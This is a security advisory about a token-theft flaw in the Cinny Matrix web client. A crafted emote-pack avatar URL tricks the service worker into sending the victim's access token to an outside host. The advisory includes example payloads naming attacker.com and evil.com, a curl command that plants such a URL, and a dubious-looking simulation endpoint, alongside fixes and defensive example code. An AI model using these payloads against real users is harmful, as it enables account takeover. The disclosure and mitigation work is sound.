Cinny, Token Theft via EmojiBoard, CVE(not provided) (Critical)


How the vulnerability works:

  1. The attacker shares a Matrix room with the victim and has permission to create room emotes.
  2. The attacker creates a malicious emote pack with a crafted `pack.meta.avatar` URL.
  3. The URL is not an MXC resource but an arbitrary HTTP/HTTPS address.
  4. The EmojiBoard component incorrectly trusts this user-controlled avatar URL as a fallback.
  5. The victim opens the emoji or sticker picker inside that compromised room.
  6. The client fetches the malicious pack metadata, including the attacker's URL.
  7. The service worker intercepts all outbound GET requests.
  8. It checks whether the request URL contains `/_matrix/client/v1/media/download` or `.../thumbnail`.
  9. The malicious URL includes those path fragments (e.g., `https://attacker.com/_matrix/client/v1/media/download/fake`).
  10. The service worker attaches the victim's `Authorization: Bearer <access token>` header to that request.
  11. No verification is performed that the request host matches the configured homeserver origin.
  12. The attacker's server receives the GET request carrying the victim's Matrix access token.
  13. The attacker can then impersonate the victim on the Matrix network.
  14. The vulnerability requires the victim to be logged in (authenticated).
  15. No user interaction beyond opening the emoji/sticker picker is needed.
  16. The attack vector is remote and requires the attacker to already share a room with the victim (e.g., a DM).
  17. The flaw exists in Cinny web app versions before v4.10.3.
  18. Root cause 1: missing validation that `pack.meta.avatar` is an MXC URL.
  19. Root cause 2: the service worker lacks a host/origin check and matches only on media path prefixes.
  20. Patched by converting the avatar to an MXC URL and restricting token attachment to same-origin requests.

    dailycve form:

    Platform: Cinny web app
    Version: < v4.10.3
    Vulnerability: Token theft via emoji
    Severity: Critical
    date: 2026-05-07

    Prediction: Patch v4.10.3 available

    Analytics under What Undercode Say:

    Check the service worker for token attachment on media paths:
    grep -rn "Authorization" cinny-service-worker.js | grep "_matrix/client/v1/media"

    Simulate malicious emote pack meta:
    curl -X POST -H "Authorization: Bearer YOUR_TOKEN" \
      "https://cinny.example/_matrix/media/v3/create" \
      -d '{"avatar":"https://attacker.com/_matrix/client/v1/media/download/evil"}'

    Monitor the network for unauthorized token transmission (note: traffic on port 443 is
    TLS-encrypted, so grepping for "Bearer" only matches plaintext captures; inspect the
    outgoing request headers in the browser's DevTools network panel instead):
    tcpdump -i any -A -s 0 'host attacker.com and port 443' | grep "Bearer"

    How the exploit works:

– The attacker sends a room invite and creates a custom emote pack with `"avatar":"https://evil.com/_matrix/client/v1/media/download/x"`.
– The victim opens the emoji picker → the browser sends a `GET` to evil.com with `Authorization: Bearer victim_token`.

Protection from this CVE

  • Upgrade Cinny to v4.10.3 or later.
  • Validate that `pack.meta.avatar` is an `mxc://` URL before rendering; reject HTTP/HTTPS and other non-Matrix hosts.
  • Modify the service worker to attach tokens only to requests whose origin matches the configured homeserver.
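To make the two root causes and their fixes concrete, here is an added example (not Cinny's own code): the vulnerable path-substring check next to a same-origin check for the service worker, plus strict `mxc://` validation for the pack avatar. Function names, the homeserver URL and the attacker URL are assumed or constructed for illustration.

```javascript
// Added example, not Cinny's code. Models the two root causes from the write-up.
// Function names (shouldAttachTokenVulnerable, shouldAttachTokenFixed,
// resolveAvatar, buildMediaRequest) are assumed, not Cinny's.
const MEDIA_PATHS = [
  '/_matrix/client/v1/media/download',
  '/_matrix/client/v1/media/thumbnail',
];

// Root cause 2 (vulnerable): decides purely on a path substring, so ANY host
// whose URL embeds a media path gets the bearer token attached.
function shouldAttachTokenVulnerable(requestUrl) {
  return MEDIA_PATHS.some((p) => requestUrl.includes(p));
}

// Fixed: the request must be same-origin with the configured homeserver AND
// its pathname must start with a media path. Unparseable URLs get no token.
function shouldAttachTokenFixed(requestUrl, homeserverUrl) {
  let req, hs;
  try {
    req = new URL(requestUrl);
    hs = new URL(homeserverUrl);
  } catch (e) {
    return false;
  }
  if (req.origin !== hs.origin) return false; // scheme + host + port must match
  return MEDIA_PATHS.some((p) => req.pathname.startsWith(p));
}

// Root cause 1: pack.meta.avatar must be an MXC URI (mxc://<server>/<media-id>).
// Anything else (http/https/data/...) is rejected instead of used as a fallback,
// and the accepted value is resolved against the homeserver, never a foreign host.
function resolveAvatar(avatar, homeserverUrl) {
  const m = /^mxc:\/\/([^/]+)\/([^/?#]+)$/.exec(avatar || '');
  if (!m) return null;
  const server = encodeURIComponent(m[1]);
  const mediaId = encodeURIComponent(m[2]);
  return `${new URL(homeserverUrl).origin}/_matrix/client/v1/media/download/${server}/${mediaId}`;
}

// Assumed shape of the fetch-handler wiring: the token is added only when the
// fixed predicate passes, so a cross-origin media-lookalike URL stays unauthenticated.
function buildMediaRequest(requestUrl, homeserverUrl, accessToken) {
  const headers = {};
  if (shouldAttachTokenFixed(requestUrl, homeserverUrl)) {
    headers.Authorization = `Bearer ${accessToken}`;
  }
  return { url: requestUrl, headers };
}
```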

Impact:

Complete account takeover of victim in Matrix. Attacker can read private messages, join rooms, modify profile, and escalate access.


Sources:

Reported By: github.com